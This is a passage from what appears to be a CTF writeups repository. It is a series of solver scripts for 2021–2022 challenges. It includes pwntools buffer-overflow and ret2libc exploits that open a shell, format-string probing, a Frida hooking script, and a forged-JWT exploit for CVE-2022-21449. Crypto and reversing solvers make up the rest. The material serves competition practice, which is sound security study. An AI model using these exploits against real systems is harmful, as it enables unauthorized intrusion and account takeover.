r.sendline(flag+"".join(payload)) 40 | # tmp = r.recvuntil("[").strip("[") 41 | # print(tmp) 42 | # if(tmp.count("1")==(counter/2)+1): 43 | # flag += i+j 44 | # payload = payload[-2:] 45 | # brute = False 46 | # break 47 | # # counter += 2 48 | # r.close() 49 | # if(brute==False): 50 | # break -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_over.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | exe_file="./source_fixed" 4 | server="chall.codefest.tech" 5 | port="8780" 6 | libc_file="/lib/x86_64-linux-gnu/libc.so.6" 7 | 8 | exe = ELF(exe_file,0) 9 | libc = ELF(libc_file,0) 10 | 11 | context.binary = exe 12 | # context.terminal = [] 13 | 14 | def conn(): 15 | if args.LOCAL: 16 | return process([exe.path]) 17 | else: 18 | return remote(server,port) 19 | 20 | def attach(r,gdbscript): 21 | if type(r) == process: 22 | gdb.attach(r,gdbscript) 23 | 24 | def exploit(): 25 | flag_func = p64(0x00000000004011b6) 26 | payload = "A"*0x20 27 | payload += "A"*0x8 28 | payload += flag_func 29 | r.recvuntil("function\n") 30 | r.sendline(payload) 31 | 32 | 33 | if __name__ == "__main__": 34 | r = conn() 35 | exploit() 36 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_pawry.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | exe_file="./pawry" 4 | server="chall.codefest.tech" 5 | port="8686" 6 | # libc_file="./libc.so" 7 | libc = ELF("./libc.so") 8 | ld = ELF("./ld-2.31.so") 9 | 10 | exe = ELF(exe_file,0) 11 | # libc = ELF(libc_file,0) 12 | 13 | context.binary = exe 14 | # context.terminal = [] 15 | 16 | def conn(): 17 | if args.LOCAL: 18 | return process([ld.path, exe.path], env={"LD_PRELOAD": libc.path}) 19 | else: 20 | return remote(server,port) 21 | 22 | def attach(r,gdbscript): 23 | if type(r) == process: 24 | gdb.attach(r,gdbscript) 25 | 26 | def exploit(): 27 | r.recvuntil("address hai : ") 28 | tmp = r.recvline() 29 | puts_leak = int(tmp.strip().encode('hex').replace("1b5b33383b353b38336d3078","").replace("1b5b306d","").decode('hex'),16) 30 | print(hex(puts_leak)) 31 | 32 | puts_libc = libc.sym['puts'] 33 | libc.address = puts_leak - puts_libc 34 | 35 | binsh = next(libc.search("/bin/sh")) 36 | system = libc.sym["system"] 37 | exit = libc.sym["exit"] 38 | 39 | log.info("Libc Base : "+hex(libc.address)) 40 | 41 | payload = "A"*0x18 42 | payload += "A"*0x4 43 | payload += p32(system) 44 | payload += p32(exit) 45 | payload += p32(binsh) 46 | 47 | r.sendline(payload) 48 | 49 | 50 | if __name__ == "__main__": 51 | r = conn() 52 | exploit() 53 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_rsa.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | r = 9270827390528364910655381211348387322489850037696558436748157342122315986076548828640373264134873757332529116344630163645837117897238251300148523115459441 3 | pq = 80970512687406090889060992576336286518763523653333428346066206717567693624044162491796922556346210471950404967161997779545603412053582932354160368128117099634532601019309976159157713252768640669410333127578132624183514430252557952811102781031315190048386214745340936679285725364013916829276058253922234988379 4 | phi = (r-1) 5 | e = 65537 6 | d = inverse(e,phi) 7 | c = 221975957171552618997196127189899209276336291387640550554967727731818563960555600691881715668156105819191779108737770660990397331961689607338541452069797368288215716485835439777459317512238532636172979397173548812054679237802827275184091619620252887678664409116710340000218841023351238456144820005968602870644031701303645229364391309952172259686888808938835775360009896210855708140351244441167461823250549764537506364091367096196182191704433664638829177854628679 8 | n = 750663646847528873168937831391907810647591913965562495296199585082759057318274521553757550724463451891668175905206221877858317290777877060166997790624527965837837993129383290402509996587556406778482067347232022225466937668396768390983554357611376057823852179263682649072729435912583278183812954787442057976301035654942470184201720410477691326653029842426252391647509934740335989269071438620690320401576861478427178128804784352142271832603194431176323445880836139 9 | print(long_to_bytes(pow(c,d,r))) 10 | -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_stream.py: -------------------------------------------------------------------------------- 1 | key = ['1' for i in range(16)] 2 | 3 | key[8] = '{' 4 | 5 | key[10] = 't' 6 | key[11] = 's' 7 | key[12] = '5' 8 | key[13] = '5' 9 | key[14] = 'e' 10 | key[15] = '}' 11 | 12 | print 'codefest'+''.join(key)[8:] -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_too.py: -------------------------------------------------------------------------------- 1 | buf = [0x62, 0x6d, 0x67, 0x61, 0x63, 0x63, 0x74, 0x7c, 0x72, 0x7e, 0x63, 0x65, 0x7e, 0x51, 0x66, 0x63, 0x4e, 0x70, 0x72, 0x21, 0x7c, 0x75, 0x64, 0x65] 2 | flag = "" 3 | for i in range(len(buf)): 4 | flag += chr(buf[i]^i+1) 5 | print flag -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/SolverCryptex.java: -------------------------------------------------------------------------------- 1 | import java.security.MessageDigest; 2 | import java.util.Arrays; 3 | import javax.crypto.Cipher; 4 | import javax.crypto.spec.SecretKeySpec; 5 | 6 | class SolverCryptex{ 7 | public static byte[] p = {-114, 62, 98, 26, 54, -7, -59, -47, 55, 88, 18, -1, -99, 116, -51, 62}; 8 | public static byte[] q = {-84, 25, 77, -101, -53, -124, -100, 61, 74, 102, 50, -11, -24, 62, -54, -71}; 9 | public static byte[] r = {11, -35, 55, 10, 62, 79, 125, 62, -28, 115, 77, 4, 73, 0, 11, 121, -126, 85, -83, 109, 1, -98, 35, -68, -4, -122, 14, 110, -28, 111, 22, -125}; 10 | 11 | public static void main(String[] args) { 12 | byte[] bArr2 = p; 13 | byte[] bArr; 14 | SecretKeySpec secretKeySpec = new SecretKeySpec(bArr2, 0, bArr2.length, "AES"); 15 | try{ 16 | MessageDigest instance = MessageDigest.getInstance("SHA-256"); 17 | instance.reset(); 18 | byte[] digest = r; 19 | try{ 20 | Cipher instance2 = Cipher.getInstance("AES/ECB/NoPadding"); 21 | instance2.init(Cipher.DECRYPT_MODE, secretKeySpec); 22 | bArr = instance2.doFinal(digest); 23 | StringBuilder sb = new StringBuilder(); 24 | for (byte b : bArr) { 25 | sb.append(String.format("%02x", b)); 26 | } 27 | System.out.println(sb.toString()); 28 | } 29 | catch(Exception e2){ 30 | System.out.println("asd"); 31 | } 32 | } 33 | catch(Exception e){ 34 | System.out.println("asd"); 35 | } 36 | } 37 | } -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/solver_flipping.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | def flip(payload): 5 | result = "" 6 | for i in payload.decode('hex'): 7 | result += chr(ord(i)^0xff) 8 | return result.encode('hex') 9 | 10 | init = "A"*15 11 | flag = "" 12 | r=remote("challs.dvc.tf",3333) 13 | 14 | while('}' not in flag): 15 | print(flag) 16 | r.recvuntil("?") 17 | r.sendline(init.encode('hex')) 18 | tmp = r.recvuntil("= ") 19 | result = r.recvline().strip() 20 | if("!" in tmp): 21 | result = flip(result) 22 | for i in string.printable[:-6]: 23 | r.recvuntil("?") 24 | r.sendline(init.encode('hex')+flag.encode('hex')+i.encode('hex')) 25 | tmp = r.recvuntil("= ") 26 | cmp_val = r.recvline().strip() 27 | if("!" in tmp): 28 | cmp_val = flip(cmp_val) 29 | if(cmp_val.decode('hex')[16:32]==result.decode('hex')[16:32]): 30 | flag += i 31 | init = init[:-1] 32 | break 33 | print flag -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/solver_format.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | r = remote("challs.dvc.tf", 8888) 3 | for i in range(3,200): 4 | try: 5 | payload = "%"+str(i)+"$s" 6 | r.recvuntil(":") 7 | r.sendline(payload[::-1]) 8 | r.recvuntil("Result: \n") 9 | print(i,r.recvline()) 10 | except Exception as e: 11 | r = remote("challs.dvc.tf", 8888) 12 | continue 13 | -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/solver_rocca.py: -------------------------------------------------------------------------------- 1 | buf = [0x77, 0x41, 0x50, 0x63, 0x55, 0x4c, 0x5a, 0x68, 0x7f, 0x6, 0x78, 0x4, 0x4c, 0x44, 0x64, 0x6, 0x7e, 0x5a, 0x22, 0x59, 0x74, 0x4a] 2 | flag = "" 3 | for i in range(22): 4 | if(i&1): 5 | flag += chr(buf[i]^0x37) 6 | else: 7 | flag += chr(buf[i]^0x13) 8 | print(flag) -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/solver_rsa.py: -------------------------------------------------------------------------------- 1 | import gmpy2 2 | from Crypto.Util.number import * 3 | 4 | cipher = 4207289555943423943347752283361812551010483368240079114775648492647342981294466041851391508960558500182259304840957212211627194015260673748342757900843998300352612100260598133752360374373 5 | with gmpy2.local_context(gmpy2.context(), precision=800) as ctx: 6 | ctx.precision += 800 7 | root = gmpy2.cbrt(cipher) 8 | print long_to_bytes(root) -------------------------------------------------------------------------------- /solver/2021/dvCTF2021/solver_themore.sage: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sage 2 | 3 | from Crypto.Util.number import inverse, long_to_bytes 4 | 5 | n = 31599415905194296507531163994468257280886159280045654346389430217405819290199334738577568528414824952061262558727052291045816515870348057534996441596560396962516719727878569643953152119895297353348080193869479088114850667155373326828408666807238584625432868509009967976378084883283066242914464294233411627 6 | e = 65537 7 | c = 11371525982887248215036029303506383319725323173791816242922348267059091038845164126422411329763551336318264887183213679689757761368186436315189029720350805092964515239812759488055450797557376437081404871060787004042110689348646779529227539692241991396962852995556540999064671425810298104591755058349120054 8 | 9 | primes = ecm.factor(n) 10 | 11 | phi = prod(p-1 for p in primes) 12 | d = inverse(e,phi) 13 | flag = long_to_bytes(pow(c,d,n)).decode() 14 | 15 | print(flag) -------------------------------------------------------------------------------- /solver/2021/foobar2021/solver_child.py: -------------------------------------------------------------------------------- 1 | key = (71+76+85+71)<<8 2 | buf = [0x12f78, 0x12f30, 0x12f72, 0x12f5f, 0x12f61, 0x12f6e, 0x12f64, 0x12f5f, 0x12f6c, 0x12f30, 0x12f67, 0x12f31, 0x12f63, 0x12f40, 0x12f6c, 0x12f5f, 0x12f73, 0x12f68, 0x12f31, 0x12f66, 0x12f74, 0x12f5f, 0x12f65, 0x12f40, 0x12f73, 0x12f79, 0x12f5f, 0x12f72, 0x12f31, 0x12f67, 0x12f68, 0x12f38, 0x12f3f, 0x12f3f] 3 | flag = "" 4 | for i in buf: 5 | flag += chr(i^key) 6 | print flag -------------------------------------------------------------------------------- /solver/2021/foobar2021/solver_read.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | arr = ['\x1f','\x1e','\x18','\x19','\x1e','\x12','\x18','\x1e','\x12','\x1d','\x19','\x19','\x1c','\x1e','\x1d','\x1e','\x1b'] 4 | flag = [] 5 | for j in arr: 6 | tmp = [] 7 | for i in string.printable[:-6]: 8 | if((ord(i)^0x14)>>2==ord(j)): 9 | tmp.append(i) 10 | flag.append(tmp) 11 | for i in flag: 12 | print i 13 | 14 | # for i in arr: 15 | # flag += chr((ord(i)<<2)^0x14) 16 | # print flag -------------------------------------------------------------------------------- /solver/2021/foobar2021/solver_try.py: -------------------------------------------------------------------------------- 1 | key = [81, 87, 69, 82, 84, 89, 85, 73, 79, 80, 65, 83, 68, 70, 71, 72, 74, 75] 2 | buf = [0x160, 0x6c, 0x100, 0x54, 0x2f0, 0xa0, 0x670, 0x1e0, 0x7b0, 0xcc, 0x250, 0x194, 0x700, 0x1c8, 0x240, 0xa8, 0x7b0, 0xd8] 3 | flag = "" 4 | for i in range(len(buf)): 5 | if(i%2==1): 6 | flag+=chr((buf[i]//4)^key[i]) 7 | else: 8 | flag+=chr((buf[i]//16)^key[i]) 9 | print(flag) -------------------------------------------------------------------------------- /solver/2021/foobar2021/solver_wargames.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | correct = [159, 218, 153, 214, 45, 206, 153, 374] 4 | key = 'PEACEOUT' 5 | tmp = [] 6 | res = [] 7 | l2 = [192, 18, 117, -32, 120, -16, 173, -2] 8 | for i in range(0,len(correct),2): 9 | tmp.append((correct[i]^69)>>1) 10 | tmp.append((correct[i+1]^10)>>2) 11 | # [res.append(ord(key[i]) + l2[i]) if i & 1 == 1 else res.append(l2[i]-ord(key[i])) for i in range(len(l2))] 12 | for i in range(len(l2)): 13 | if i & 1 ==1: 14 | res.append(ord(key[i]) - l2[i]) 15 | else: 16 | res.append(l2[i]-ord(key[i])) 17 | 18 | for i in range(len(res)): 19 | if(res[i]<0): 20 | res[i]*=-1 21 | # print(''.join(map(chr,res))) 22 | # launchcode = "A"*16+"B"*8 23 | # l3 = launchcode[int(2 * 24 / 3):] 24 | KEY = "There's no way to win" 25 | I = 7 26 | KARMA = [ 27 | 123, 47, 86, 28, 74, 50, 32, 114] 28 | possible = [] 29 | for x in range(8): 30 | tmp = [] 31 | for i in string.printable[:-6]: 32 | if((ord(i) + I ^ ord(KEY[I])) % 255 == KARMA[x]): 33 | tmp.append(i) 34 | I = (I + 1) % len(KEY) 35 | possible.append(tmp) 36 | for i in possible: 37 | print i 38 | -------------------------------------------------------------------------------- /solver/2021/pico2021/solver_brute.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import long_to_bytes as l2b 2 | 3 | arr_i = [] 4 | def swap(arr,a2,a3): 5 | scope = a2 - a3 + 1 6 | i=0 7 | while True: 8 | if(i>=scope): 9 | break 10 | v3 = arr[i] 11 | arr[i] = arr[i+a3-1] 12 | arr[i+a3-1] = v3 13 | i+=a3 14 | arr_i.append(i) 15 | return arr 16 | 17 | def reswap(arr,a2,a3): 18 | scope = a2 - a3 + 1 19 | i=arr_i[a3-1] 20 | i-=a3 21 | while True: 22 | if(i<0): 23 | break 24 | v3 = arr[i] 25 | arr[i] = arr[i+a3-1] 26 | arr[i+a3-1] = v3 27 | i-=a3 28 | return arr 29 | 30 | payload = "A"*8 31 | enc = l2b(0x4662461f4662461f) 32 | key = [] 33 | for i in range(4): 34 | key.append(ord(payload[i])^ord(enc[i])) 35 | key = key[::-1] 36 | 37 | # junk to generate arr_i 38 | tmp = list(l2b(0x4662461f)[::-1]*8) 39 | for i in range(1,0x1e): 40 | tmp = swap(tmp,0x1e,i) 41 | 42 | # unused , because there is initial array before reverse swap 43 | # for i in range(0x1e-1,0,-1): 44 | # tmp = swap(tmp,0x1e,i) 45 | # print "Check",map(hex,map(ord,tmp)) 46 | 47 | tmp = [0x7a, 0x2e, 0x6e, 0x68, 0x1d, 0x65, 0x16, 0x7c, 0x6d, 0x43, 0x6f, 0x36, 0x34, 0x62, 0x47, 0x42, 0x43, 0x31, 0x40, 0x63, 0x58, 0x1, 0x58, 0x66, 0x62, 0x66, 0x53, 0x30, 0x3c, 0x17, 0x0, 0x0] 48 | 49 | for i in range(0x1d,0,-1): 50 | tmp = reswap(tmp,0x1e,i) 51 | 52 | for i in range(len(tmp)): 53 | tmp[i]^=key[i%len(key)] 54 | print(''.join(map(chr,tmp))) -------------------------------------------------------------------------------- /solver/2021/ritsec2021/solver_meme.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from Crypto.Util.strxor import strxor 3 | 4 | target = 'RS{ZQWAA' 5 | list_key = ['LN3M99BX','PQ4LL22C','WV94J7ZH','GT6BW30K','N28UB11M','FQ7FV5K2','7NFSK27C','1CZ7KHR5','1CZ7KHR5','NN52DOMW','JWVE66PI','7NFSK27C','FQ7FV5K2','N28UB11M','N28UB11M','7NFSK27C','1CZ7KHR5','7NFSK27C'] 6 | for i in list_key: 7 | # tmp = base64.b64decode(i) 8 | tmp = i.encode() 9 | print(tmp,base64.b64encode(strxor(target.encode(),tmp))) 10 | -------------------------------------------------------------------------------- /solver/2021/vishwaCTF2021/solver_flow.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | a=[[0x43, 0x42], [0x42, 0x47], [0x43, 0x3f], [0x42, 0x46], [0x43, 0x43], [0x42, 0x3d], [0x40, 0x3f], [0x41, 0x40], [0x40, 0x42], [0x43, 0x8e], [0x41, 0x41], [0x41, 0x92], [0x40, 0x90], [0x3f, 0x40], [0x42, 0x91], [0x42, 0x3d], [0x40, 0x43], [0x42, 0x41], [0x40, 0x40], [0x41, 0x92], [0x43, 0x40], [0x3f, 0x3c], [0x41, 0x92], [0x42, 0x90], [0x3f, 0x3c], [0x40, 0x40], [0x3f, 0x3d], [0x42, 0x42], [0x41, 0x47], [0x41, 0x47], [0x41, 0x47], [0x41, 0x92], [0x41, 0x43], [0x3f, 0x3f], [0x42, 0x8f], [0x42, 0x8f], [0x41, 0x92], [0x42, 0x40], [0x3f, 0x3f], [0x43, 0x3f], [0x42, 0x41], [0x43, 0x3e], [0x41, 0x8f], [0x3e, 0x92], [0x3f, 0x3f], [0x42, 0x40], [0x43, 0x90]] 4 | tmp = [] 5 | for i in a: 6 | tmp.append(int(chr(int(str(i[0]),8))+chr(int(str(i[1]),8)),16)) 7 | print ''.join(map(chr,tmp)) -------------------------------------------------------------------------------- /solver/2022/addactf/helper_flutter.js: -------------------------------------------------------------------------------- 1 | //frida -U -f com.example.flutter_ctf_challenge -l helper_flutter.js --no-pause 2 | 3 | function hookFunc() { 4 | var isolate = 0x00000000001a8d70; 5 | // encrypt input 0x000000000020d5e0 6 | // base64 encode 0x000000000025631c 7 | var target = 0x000000000020c200; 8 | var dumpOffset = isolate + target; 9 | 10 | var argBufferSize = 300 11 | 12 | var address = Module.findBaseAddress('libapp.so') // libapp.so (Android) or App (IOS) 13 | console.log('\n\nbaseAddress: ' + address.toString()) 14 | 15 | var codeOffset = address.add(dumpOffset) 16 | console.log('codeOffset: ' + codeOffset.toString()) 17 | console.log('') 18 | console.log('Wait..... ') 19 | 20 | Interceptor.attach(codeOffset, { 21 | onEnter: function(args) { 22 | 23 | console.log('') 24 | console.log('--------------------------------------------|') 25 | console.log('\n Hook Function: ' + dumpOffset); 26 | console.log('') 27 | console.log('--------------------------------------------|') 28 | console.log('') 29 | 30 | for (var argStep = 0; argStep < 50; argStep++) { 31 | try { 32 | dumpArgs(argStep, args[argStep], argBufferSize); 33 | } catch (e) { 34 | break; 35 | } 36 | 37 | } 38 | // for(let i = 0; i < 8; i++) { try { console.log("addr",i,args[i], "\r\n");console.log(hexdump(args[i]), "\r\n"); } catch (error) { console.log("fail",i,(args[i]), "\r\n"); } } 39 | 40 | }, 41 | onLeave: function(retval) { 42 | console.log('RETURN : ' + retval) 43 | // console.log(hexdump(retval)) 44 | dumpArgs(0, retval, 300); 45 | 46 | // for (var argStep = 0; argStep < 50; argStep++) { 47 | // try { 48 | // dumpArgs(argStep, retval[argStep], argBufferSize); 49 | // } catch (e) { 50 | 51 | // break; 52 | // } 53 | 54 | // } 55 | } 56 | }); 57 | 58 | } 59 | 60 | function dumpArgs(step, address, bufSize) { 61 | 62 | var buf = Memory.readByteArray(address, bufSize) 63 | 64 | console.log('Argument ' + step + ' address ' + address.toString() + ' ' + 'buffer: ' + bufSize.toString() + '\n\n Value:\n' +hexdump(buf, { 65 | offset: 0, 66 | length: bufSize, 67 | header: false, 68 | ansi: false 69 | })); 70 | 71 | console.log('') 72 | console.log('----------------------------------------------------') 73 | console.log('') 74 | } 75 | 76 | setTimeout(hookFunc, 1000) -------------------------------------------------------------------------------- /solver/2022/addactf/libnative-lib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2022/addactf/libnative-lib.so -------------------------------------------------------------------------------- /solver/2022/addactf/solver_coffee.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from Cryptodome.Cipher import AES 3 | from Cryptodome.Random import get_random_bytes 4 | 5 | cipher_message = "8ddaBqtgQvIgMF30Z6mHl4iu/eSKNn1Yrbwrq0Q71FNEznkKClRhZzogBesSkxnp98mVAMwpncNTog==" 6 | decoded_cipher_byte = base64.b64decode(cipher_message) 7 | iv = base64.b64decode("eSTXMzmXqb8H0H4T") 8 | key = base64.b64decode("1VSWtawezwedBWQ11Rd2xA==") 9 | cipher = AES.new(key, AES.MODE_GCM, iv) 10 | print(cipher.decrypt(decoded_cipher_byte)) -------------------------------------------------------------------------------- /solver/2022/addactf/solver_hiddengoald.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import Salsa20 2 | import base64 3 | 4 | list_ct = ['c8Cf5vA=','eNGm2vc=','IdDK05g=','VoWMqrM=r','I8am0PQ=','dNWV4A==','c8Cf5vA=','eNGm2vc=','IdDK05g=','VoWMqrM=r','I8am0PQ=','dNWV4A==','c8Cf5vA=','eNGm2vc=','IdDK05g=','VoWMqrM=r','I8am0PQ=','dNWV4A==','c8Cf5vA=','eNGm2vc=','IdDK05g=','VoWMqrM=r','I8am0PQ=','dNWV4A=='] 5 | flag = b"" 6 | for tmp in list_ct: 7 | ct = base64.b64decode(tmp) 8 | secret = b'ig154jDmBpyzSkmXKeJg0H7Ol1SpV80b' 9 | cipher = Salsa20.new(secret,b'ctf_s_iv') 10 | flag += cipher.decrypt(ct) 11 | print(flag[:flag.index(b'}')+1]) -------------------------------------------------------------------------------- /solver/2022/addactf/solver_securitybreach.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from z3 import * 3 | 4 | v1 = [0 for i in range(59)] 5 | v1[0] = 0x110904; 6 | v1[1] = 0x2A00B06; 7 | v1[2] = 0x2310C00; 8 | v1[3] = 53873929; 9 | v1[4] = 33755658; 10 | v1[5] = 251659273; 11 | v1[6] = 1711541250; 12 | v1[7] = 1175851010; 13 | v1[8] = 470942466; 14 | v1[9] = 1578046466; 15 | v1[10] = 335872514; 16 | v1[11] = 18026242; 17 | v1[12] = 0xBB0A0900; 18 | v1[13] = 18025731; 19 | v1[14] = 26214420; 20 | v1[15] = 30543633; 21 | v1[16] = 15405833; 22 | v1[17] = 47780360; 23 | v1[18] = 18421015; 24 | v1[19] = 9176330; 25 | v1[20] = 47253256; 26 | v1[21] = 1572867; 27 | v1[22] = 48431639; 28 | v1[23] = 38147082; 29 | v1[24] = 51643650; 30 | v1[25] = 67113219; 31 | v1[26] = 67345168; 32 | v1[27] = 101647124; 33 | v1[28] = 1379076; 34 | v1[29] = 61279754; 35 | v1[30] = 16847883; 36 | v1[31] = 302170132; 37 | v1[32] = 84169476; 38 | v1[33] = 118686211; 39 | v1[34] = 218104880; 40 | v1[35] = 437262082; 41 | v1[36] = 18290180; 42 | v1[37] = 8192786; 43 | v1[38] = 11142154; 44 | v1[39] = 61278734; 45 | v1[40] = 151062787; 46 | v1[41] = 83994127; 47 | v1[42] = 352496151; 48 | v1[43] = 16843538; 49 | v1[44] = 67218448; 50 | v1[45] = 335852566; 51 | v1[46] = 218300419; 52 | v1[47] = 336003822; 53 | v1[48] = 353108591; 54 | v1[49] = 184615478; 55 | v1[50] = 100794951; 56 | v1[51] = 386073099; 57 | v1[52] = 84017414; 58 | v1[53] = 101450092; 59 | v1[54] = 33751274; 60 | v1[55] = 68354273; 61 | v1[56] = 269615523; 62 | v1[57] = 34342001; 63 | v1[58] = 5; 64 | 65 | s = Solver() 66 | v2 = [BitVec("x{}".format(i), 8) for i in range(24)] 67 | tmp = b"" 68 | for i in v1: 69 | tmp += long_to_bytes(i)[::-1].ljust(4,b"\x00") 70 | tmp = list(tmp) 71 | counter = 0 72 | while tmp[counter]!=5: 73 | if(tmp[counter]==1): 74 | fmt = "s.add(v2[{}] * v2[{}] == {})" 75 | exec(fmt.format(tmp[counter+1],tmp[counter+2],tmp[counter+3])) 76 | elif(tmp[counter]==2): 77 | fmt = "s.add(v2[{}] ^ v2[{}] == {})" 78 | exec(fmt.format(tmp[counter+1],tmp[counter+2],tmp[counter+3])) 79 | elif(tmp[counter]==3): 80 | fmt = "s.add(v2[{}] >= v2[{}])" 81 | exec(fmt.format(tmp[counter+1],tmp[counter+2])) 82 | counter -= 1 83 | elif(tmp[counter]==4): 84 | fmt = "s.add(v2[{}] < v2[{}])" 85 | exec(fmt.format(tmp[counter+1],tmp[counter+2])) 86 | counter -= 1 87 | elif(tmp[counter]==0): 88 | # print(tmp,j) 89 | fmt = "s.add(v2[{}] + v2[{}] == {})" 90 | exec(fmt.format(tmp[counter+1],tmp[counter+2],tmp[counter+3])) 91 | else: 92 | print("fail",counter) 93 | break 94 | counter += 4 95 | 96 | s.check() 97 | flag="" 98 | model=s.model() 99 | for i in v2: 100 | flag+=chr(model[i].as_long()) 101 | print(flag) -------------------------------------------------------------------------------- /solver/2022/addactf/solver_wondermaze.py: -------------------------------------------------------------------------------- 1 | from qiling import Qiling 2 | 3 | ql = Qiling(['./libnative-lib.so'], '.') 4 | ql.mem.map(0, 0x1000) # for FS:0x28 5 | BASE = ql.loader.load_address 6 | 7 | def root(): 8 | a = [0x37,0x3F,0x3D,0x3B,0x37,0x39,0x6E,0x3E,0x39,0x6C,0x6C,0x3F,0x6D,0x69,0x37,0x3E,0x6B,0x69,0x3A,0x3F,0x3B,0x3A,0x3E,0x3B,0x38,0x3B,0x3D,0x36,0x3F,0x6C,0x3F,0x69,0x3B,0x6E,0x6C,0x39,0x39,0x3C,0x38,0x3D,0x3D,0x6C,0x39,0x6B,0x3F,0x6D,0x38,0x6E,0x36,0x3B,0x6B,0x3A,0x6A,0x3D,0x39,0x6C,0x6D,0x6B,0x6E,0x3A,0x3B,0x6B,0x3E,0x3A,0x3E,0x69,0x3C,0x36,0x6C,0x3C,0x3A,0x38,0x3E,0x3C,0x69,0x36,0x6A,0x6C,0x3A,0x6A,0x39,0x3B,0x6A,0x3A,0x3A,0x6E,0x3E,0x39,0x3B,0x6A,0x6E,0x3E,0x6E,0x3A,0x37,0x3D,0x36,0x38,0x69,0x3A,0x37,0x6B,0x6A,0x6C,0x36,0x38,0x39,0x3B,0x3C,0x3B,0x37,0x39,0x6D,0x3F,0x39,0x6D,0x6E,0x36,0x69,0x6E,0x3B,0x37,0x69,0x69,0x3C,0x39,0x6D,0x6A,0x3B,0x3C,0x6E,0x3D,0x6D,0x6C,0x3B,0x69,0x38,0x3B,0x3B,0x3A,0x3A,0x37,0x6A,0x3F,0x6E,0x6B,0x3D,0x3E,0x69,0x3C,0x69,0x37,0x6A,0x6A,0x6E,0x6B,0x36,0x6C,0x3A,0x6C,0x38,0x37,0x3B,0x6E,0x6B,0x3B,0x6A,0x36,0x3F,0x36,0x3C,0x3C,0x38,0x69,0x6B,0x6C,0x6B,0x69,0x6E,0x37,0x3B,0x3A,0x36,0x6B,0x69,0x6D,0x38,0x6B,0x3C,0x37,0x36,0x36,0x38,0x37,0x6B,0x37,0x3E,0x3C,0x3E,0x6A,0x36,0x3A,0x37,0x6A,0x3A,0x6C,0x3B,0x6B,0x3B,0x39,0x6B,0x39,0x36,0x39,0x3E,0x6B,0x69,0x3C,0x6D,0x38,0x6B,0x6D,0x6C,0x3E,0x36,0x3C,0x3C,0x3B,0x3F,0x38,0x6E,0x69,0x6C,0x36,0x6A,0x3E,0x39,0x6C,0x38,0x37,0x38,0x6B,0x3A,0x6C,0x3D,0x3F,0x6E,0x6B,0x6E,0x3F,0x3C,0x69,0x3C,0x6B,0x6A,0x6D,0x6E,0x3D,0x6D] 9 | val = "" 10 | for i in a: 11 | val += chr(i^0xf) 12 | return bytes.fromhex('0'+val) 13 | 14 | def device_native(): 15 | ql.run(BASE+0x1190, BASE+0x13D3) 16 | rsp = ql.arch.regs.rsp 17 | address = rsp 18 | size = 259 19 | res = ql.mem.read(address, size) 20 | return bytes.fromhex('0'+res.decode()) 21 | 22 | def time_native(): 23 | ql.run(BASE+0x1640, BASE+0x17F2) 24 | rsp = ql.arch.regs.rsp 25 | address = rsp 26 | size = 259 27 | res = ql.mem.read(address, size) 28 | return bytes.fromhex('0'+res.decode()) 29 | 30 | arr = [root(),time_native(),device_native()] 31 | 32 | flag = "" 33 | for i in range(len(arr[0])): 34 | flag += chr(arr[0][i]^arr[1][i]^arr[2][i]) 35 | print(flag[::-1]) -------------------------------------------------------------------------------- /solver/2022/aractf/solver_securebin.py: -------------------------------------------------------------------------------- 1 | # CVE-2022-21449 https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/ 2 | import asn1 3 | import base64 4 | import requests 5 | import time 6 | 7 | def gcdExtended(a, b): 8 | if a == 0 : 9 | return b,0,1 10 | gcd,x1,y1 = gcdExtended(b%a, a) 11 | x = y1 - (b//a) * x1 12 | y = x1 13 | return gcd,x,y 14 | 15 | class Rnd: 16 | def __init__(self,x): 17 | self.x = x 18 | self.M = 1<<63 19 | self.A = 6364136223846793005 20 | self.C = 1442695040888963407 21 | def prev(self): 22 | ainverse = gcdExtended(self.A, self.M)[1] 23 | self.x = (ainverse * ((self.x) - self.C)) & (self.M - 1) 24 | return self.x; 25 | 26 | encoder = asn1.Encoder() 27 | encoder.start() 28 | encoder.enter(0x10) 29 | encoder.write(0) 30 | encoder.write(0) 31 | encoder.leave() 32 | encoded_bytes = encoder.output() 33 | 34 | signature = base64.b64encode(encoded_bytes) 35 | header = base64.b64encode(b'{"typ":"JWT","alg":"ES256"}').strip(b"=") 36 | payload = base64.b64encode(b'{"username":"admin","iat":1650466502,"exp":1900470102}').strip(b"=") 37 | 38 | token = header.decode() + "." + payload.decode() + "." + signature.decode() 39 | 40 | rnd = Rnd(62221403078361557) # last seed at 18:55 41 | r = requests.session() 42 | header = {"Authorization" : "Bearer " + token} 43 | url = 'http://159.223.83.0:8080/note/' 44 | flag = "" 45 | 46 | start = time.time() 47 | while True: 48 | tmp = str(rnd.prev()) 49 | tmp += '-admin' 50 | resp = r.get(url+tmp, headers = header) 51 | if(resp.text=='error'): 52 | continue 53 | else: 54 | resp = resp.text.split("\n") 55 | flag = resp[1] + flag 56 | if('ara2022' in flag): 57 | break 58 | end = time.time() 59 | print("Time : {}".format(end-start)) 